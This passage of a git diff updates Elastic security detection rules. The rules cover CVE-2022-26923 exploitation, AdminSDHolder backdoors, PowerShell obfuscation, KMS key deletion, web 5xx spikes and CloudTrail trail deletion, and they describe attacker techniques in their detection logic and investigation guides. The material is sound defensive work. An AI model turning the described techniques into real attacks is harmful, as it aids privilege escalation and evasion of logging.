\n and event.action: (\"DisableKey\" or \"ScheduleKeyDeletion\") \n and event.outcome: \"success\"\n", + "references": [ + "https://docs.aws.amazon.com/cli/latest/reference/kms/disable-key.html", + "https://docs.aws.amazon.com/cli/latest/reference/kms/schedule-key-deletion.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6951f15e-533c-4a60-8014-a3c3ab851a1b", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS KMS", + "Use Case: Log Auditing", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "6951f15e-533c-4a60-8014-a3c3ab851a1b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_210.json b/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_210.json deleted file mode 100644 index f00177e28df..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6bed021a-0afb-461c-acbe-ffdb9574d3f3_210.json +++ /dev/null @@ -1,103 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the remote update to a computer account's DnsHostName attribute. If the new value set is a valid domain controller DNS hostname and the subject computer name is not a domain controller, then it's highly likely a preparation step to exploit CVE-2022-26923 in an attempt to elevate privileges from a standard domain user to domain admin privileges.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote Computer Account DnsHostName Update", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Remote Computer Account DnsHostName Update\n\nIn Active Directory environments, the DnsHostName attribute links computer accounts to their DNS names, crucial for network communication. Adversaries may exploit this by altering a non-domain controller's DnsHostName to mimic a domain controller, potentially exploiting vulnerabilities like CVE-2022-26923 for privilege escalation. The detection rule identifies suspicious changes by monitoring for remote updates to this attribute, especially when the new hostname resembles a domain controller's, flagging potential exploitation attempts.\n\n### Possible investigation steps\n\n- Review the event logs to confirm the occurrence of the \"changed-computer-account\" action, focusing on the user.id fields (\"S-1-5-21-*\", \"S-1-12-1-*\") to identify the user who initiated the change.\n- Verify the new DnsHostName value against the list of legitimate domain controller DNS hostnames to assess if it matches any known domain controllers.\n- Check the winlog.event_data.TargetUserName to ensure that the DnsHostName does not start with the computer name that was changed, which could indicate a false positive.\n- Investigate the account associated with the user.id to determine if it has a history of suspicious activity or if it has been compromised.\n- Examine recent changes or activities on the affected computer account to identify any unauthorized access or configuration changes.\n- Correlate this event with other security alerts or logs to identify potential patterns or coordinated activities that might indicate a broader attack.\n\n### False positive analysis\n\n- Routine maintenance or updates to computer accounts may trigger the rule if the DnsHostName is temporarily set to a domain controller-like name. To manage this, create exceptions for known maintenance periods or specific administrative accounts performing these updates.\n- Automated scripts or tools that update computer account attributes might inadvertently match the rule's conditions. Identify and exclude these scripts or tools by their user IDs or specific patterns in their operations.\n- Legitimate changes in network architecture, such as the promotion of a server to a domain controller, could be flagged. Ensure that such changes are documented and create exceptions for the involved accounts or systems during the transition period.\n- Temporary testing environments where non-domain controllers are configured with domain controller-like hostnames for testing purposes can cause false positives. Exclude these environments by their specific hostnames or network segments.\n- Regularly review and update the list of known domain controller hostnames to ensure that legitimate changes in the network are not mistakenly flagged as suspicious.\n\n### Response and remediation\n\n- Immediately isolate the affected computer from the network to prevent further unauthorized changes or potential exploitation.\n- Verify the legitimacy of the DnsHostName change by cross-referencing with known domain controller hostnames and authorized change requests.\n- Revert any unauthorized changes to the DnsHostName attribute to its original state to restore proper network communication and prevent misuse.\n- Conduct a thorough review of recent account activities and permissions for the user account involved in the change to identify any unauthorized access or privilege escalation attempts.\n- Escalate the incident to the security operations team for further investigation and to assess potential exploitation of CVE-2022-26923 or other vulnerabilities.\n- Implement additional monitoring on the affected system and similar systems to detect any further suspicious activities or attempts to exploit vulnerabilities.\n- Review and update access controls and permissions for computer accounts in Active Directory to ensure only authorized personnel can make changes to critical attributes like DnsHostName.", - "query": "iam where event.action == \"changed-computer-account\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n /* if DnsHostName value equal a DC DNS hostname then it's highly suspicious */\n winlog.event_data.DnsHostName : \"??*\" and\n\n /* exclude FPs where DnsHostName starts with the ComputerName that was changed */\n not startswith~(winlog.event_data.DnsHostName, substring(winlog.event_data.TargetUserName, 0, length(winlog.event_data.TargetUserName) - 1))\n", - "references": [ - "https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26923" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.DnsHostName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetUserName", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "6bed021a-0afb-461c-acbe-ffdb9574d3f3", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Use Case: Vulnerability", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1068", - "name": "Exploitation for Privilege Escalation", - "reference": "https://attack.mitre.org/techniques/T1068/" - }, - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 210 - }, - "id": "6bed021a-0afb-461c-acbe-ffdb9574d3f3_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_6.json b/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_6.json new file mode 100644 index 00000000000..a998d6b908b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ddb6c33-00ce-4acd-832a-24b251512023_6.json @@ -0,0 +1,178 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts with an unusually high proportion of whitespace and special characters, often indicative of obfuscation. This behavior is commonly associated with techniques such as SecureString encoding, formatting obfuscation, or character-level manipulation designed to bypass static analysis and AMSI inspection.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Special Character Overuse", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Special Character Overuse\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's flexibility to obfuscate scripts, using excessive special characters to evade detection. The detection rule identifies scripts with high special character density, indicating potential obfuscation, by analyzing script length and character patterns, thus aiding in uncovering malicious activities.\n\n### Possible investigation steps\n\n- Review the dedup_space_script_block field to understand the script's structure and identify any suspicious patterns or keywords that might indicate obfuscation techniques.\n- Analyze the replaced_with_fire field to assess the density and distribution of special characters, which can provide insights into the obfuscation methods used.\n- Examine the file.path and host.name fields to determine the origin and context of the script execution, which can help identify if the script was run on a critical system or by a privileged user.\n- Check the user.id and agent.id fields to verify the identity of the user or agent executing the script, which can help assess if the activity aligns with expected behavior or if it might be unauthorized.\n- Correlate the powershell.file.script_block_id with other logs or alerts to identify if similar scripts have been executed elsewhere in the environment, indicating a broader attack pattern.\n\n### False positive analysis\n\n- Scripts with legitimate use of special characters for formatting or encoding may trigger false positives. Review the script's purpose and context to determine if the use of special characters is justified.\n- Automated scripts that heavily rely on string manipulation or dynamic content generation might be flagged. Consider adding exceptions for known scripts or trusted sources to reduce unnecessary alerts.\n- PowerShell scripts used in development or testing environments often contain high special character density. Implement environment-based exclusions to prevent these from being flagged in non-production settings.\n- Scripts utilizing SecureString or other security-related encoding methods may appear obfuscated. Verify the script's origin and purpose, and whitelist these methods if they are part of standard security practices.\n- Regularly update the detection rule to refine the pattern matching and reduce false positives by incorporating feedback from security analysts and system administrators.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated metadata to understand the intent and potential impact of the obfuscated script.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update endpoint protection and intrusion detection systems to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// replace repeated spaces used for formatting after a new line with a single space to reduce FPs\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\n\\s+\"\"\", \"\\n \")\n\n// Look for scripts with more than 1000 chars\n| eval Esql.script_block_length = length(Esql.script_block_tmp)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n Esql.script_block_tmp,\n \"\"\"[\\s\\$\\{\\}\\+\\@\\=\\(\\)\\^\\\\\\\"~\\[\\]\\?\\.]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high whitespace and special character ratio\n| where Esql.script_block_ratio > 0.75\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_ratio", + "type": "double" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ddb6c33-00ce-4acd-832a-24b251512023", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 6 + }, + "id": "6ddb6c33-00ce-4acd-832a-24b251512023_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_212.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_212.json deleted file mode 100644 index c5232a27bf2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_212.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "AdminSDHolder Backdoor", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AdminSDHolder Backdoor\n\nThe AdminSDHolder object in Active Directory is crucial for maintaining consistent permissions across privileged accounts. It ensures that any changes to these accounts are reverted to match the AdminSDHolder's settings. Adversaries exploit this by modifying the AdminSDHolder to create persistent backdoors, regaining administrative privileges. The detection rule identifies such abuses by monitoring specific directory service changes, focusing on modifications to the AdminSDHolder object, thus alerting security teams to potential threats.\n\n### Possible investigation steps\n\n- Review the event logs for entries with event.code:5136 to identify specific changes made to the AdminSDHolder object.\n- Examine the winlog.event_data.ObjectDN field to confirm the object path is CN=AdminSDHolder,CN=System* and verify the nature of the modifications.\n- Identify the user account responsible for the changes by checking the event logs for the associated user information.\n- Investigate the history of the identified user account to determine if there are any other suspicious activities or patterns of behavior.\n- Assess the current permissions on the AdminSDHolder object and compare them with the expected baseline to identify unauthorized changes.\n- Check for any recent changes in group memberships or permissions of privileged accounts that could indicate exploitation of the AdminSDHolder backdoor.\n- Collaborate with the IT or security team to determine if the changes were authorized or if further action is needed to secure the environment.\n\n### False positive analysis\n\n- Routine administrative changes to the AdminSDHolder object can trigger alerts. To manage this, establish a baseline of expected changes and create exceptions for these known activities.\n- Scheduled maintenance or updates to Active Directory may result in temporary modifications to the AdminSDHolder object. Document these events and exclude them from triggering alerts during the maintenance window.\n- Automated scripts or tools used for Active Directory management might modify the AdminSDHolder object as part of their normal operation. Identify these tools and whitelist their activities to prevent false positives.\n- Changes made by trusted security personnel or systems should be logged and reviewed. Implement a process to verify and exclude these changes from alerting if they are part of approved security operations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or privilege escalation.\n- Revert any unauthorized changes to the AdminSDHolder object by restoring it from a known good backup or manually resetting its permissions to the default secure state.\n- Conduct a thorough review of all privileged accounts and groups to ensure their permissions align with organizational security policies and have not been altered to match the compromised AdminSDHolder settings.\n- Reset passwords for all accounts that were potentially affected or had their permissions altered, focusing on privileged accounts to prevent adversaries from regaining access.\n- Implement additional monitoring on the AdminSDHolder object and other critical Active Directory objects to detect any future unauthorized modifications promptly.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the breach, including identifying any other compromised systems or accounts.\n- Review and update access control policies and security configurations to prevent similar attacks, ensuring that only authorized personnel have the ability to modify critical Active Directory objects.", - "query": "event.code:5136 and winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System*\n", - "references": [ - "https://adsecurity.org/?p=1906", - "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory#adminsdholder" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.ObjectDN", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "6e9130a5-9be6-48e5-943a-9628bfc74b18", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - }, - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 212 - }, - "id": "6e9130a5-9be6-48e5-943a-9628bfc74b18_212", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_208.json b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_208.json index fb2643633d5..03418bd3477 100644 --- a/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_208.json +++ b/packages/security_detection_engine/kibana/security_rule/6f435062-b7fc-4af9-acea-5b1ead65c5a5_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_2.json b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_2.json new file mode 100644 index 00000000000..fd82d11bce9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6fa3abe3-9cd8-41de-951b-51ed8f710523_2.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Spike in Error Response Codes", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Spike in Error Response Codes\n\nThis rule detects bursts of 5xx errors (500\u2013504) from GET traffic, highlighting abnormal server behavior that accompanies active scanning or fuzzing and exposes fragile code paths or misconfigured proxies. Attackers sweep common and generated endpoints while mutating query params and headers\u2014path traversal, template syntax, large payloads\u2014to repeatedly force backend exceptions and gateway timeouts, enumerate which routes fail, and pinpoint inputs that leak stack traces or crash components for follow-on exploitation.\n\n### Possible investigation steps\n\n- Plot error rates per minute by server and client around the alert window to confirm the spike, determine scope, and separate a single noisy client from a platform-wide issue.\n- Aggregate the failing URL paths and query strings from the flagged client and look for enumeration sequences, traversal encoding, template injection markers, or oversized inputs indicative of fuzzing.\n- Examine User-Agent, Referer, header mix, and TLS JA3 for generic scanner signatures or reuse across multiple clients, and enrich the originating IP with reputation and hosting-provider attribution.\n- Correlate the timeframe with reverse proxy/WAF/IDS and application error logs or stack traces to identify which routes threw exceptions or timeouts and whether they align with the client\u2019s input patterns.\n- Validate backend and dependency health (upstreams, databases, caches, deployments) to rule out infrastructure regressions, then compare whether only the suspicious client experiences disproportionate failures.\n\n### False positive analysis\n\n- A scheduled deployment or upstream dependency issue can cause normal GET traffic to fail with 502/503/504, and many users egressing through a shared NAT or reverse proxy may be aggregated as one source IP that triggers the spike.\n- An internal health-check, load test, or site crawler running from a single host can rapidly traverse endpoints and induce 500 errors on fragile routes, mimicking scanner-like behavior without malicious intent.\n\n### Response and remediation\n\n- Immediately rate-limit or block the originating client(s) at the edge (reverse proxy/WAF) using the observed source IPs, User-Agent/TLS fingerprints, and the failing URL patterns generating 5xx bursts.\n- Drain the origin upstream(s) showing repeated 500/502/503/504 on the probed routes, roll back the latest deployment or config change for those services, and disable any unstable endpoint or plugin that is crashing under input fuzzing.\n- Restart affected application workers and proxies, purge bad cache entries, re-enable traffic gradually with canary percentage, and confirm normal response rates via synthetic checks against the previously failing URLs.\n- Escalate to Security Operations and Incident Response if 5xx spikes persist after blocking or if error pages expose stack traces, credentials, or admin route disclosures, or if traffic originates from multiple global hosting ASNs.\n- Deploy targeted WAF rules for path traversal and injection markers seen in the URLs, enforce per-IP and per-route rate limits, tighten upstream timeouts/circuit breakers, and replace verbose error pages with generic responses that omit stack details.\n- Add bot management and IP reputation blocking at the CDN/edge, lock down unauthenticated access to admin/debug routes, and instrument alerts that trigger on sustained 5xx bursts per client and per route with automatic edge throttling.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*\n| where\n http.request.method == \"GET\" and\n http.response.status_code in (\n 500, // Internal Server Error\n 502, // Bad Gateway\n 503, // Service Unavailable\n 504 // Gateway Timeout\n )\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n host.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.http_response_status_code_count = count(http.response.status_code),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.host_name_values = values(host.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.http_response_status_code_count > 10\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^2.0.0" + }, + { + "package": "apache", + "version": "^2.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.9.0" + }, + { + "package": "iis", + "version": "^1.21.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_path_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "6fa3abe3-9cd8-41de-951b-51ed8f710523", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "6fa3abe3-9cd8-41de-951b-51ed8f710523_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_210.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_210.json deleted file mode 100644 index 6b89819b196..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-441c593e16ab_210.json +++ /dev/null @@ -1,111 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an AWS log trail. An adversary may delete trails in an attempt to evade defenses.", - "false_positives": [ - "Trail deletions may be made by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Trail deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "investigation_fields": { - "field_names": [ - "@timestamp", - "user.name", - "aws.cloudtrail.user_identity.arn", - "aws.cloudtrail.user_identity.type", - "source.address", - "user_agent.original", - "aws.cloudtrail.flattened.request_parameters.name", - "event.action", - "event.outcome", - "cloud.region", - "aws.cloudtrail.request_parameters" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudTrail Log Deleted", - "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Deleted\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your Amazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to actions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services account activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and other Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and troubleshooting.\n\nThis rule identifies the deletion of an AWS log trail using the API `DeleteTrail` action. Attackers can do this to cover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and 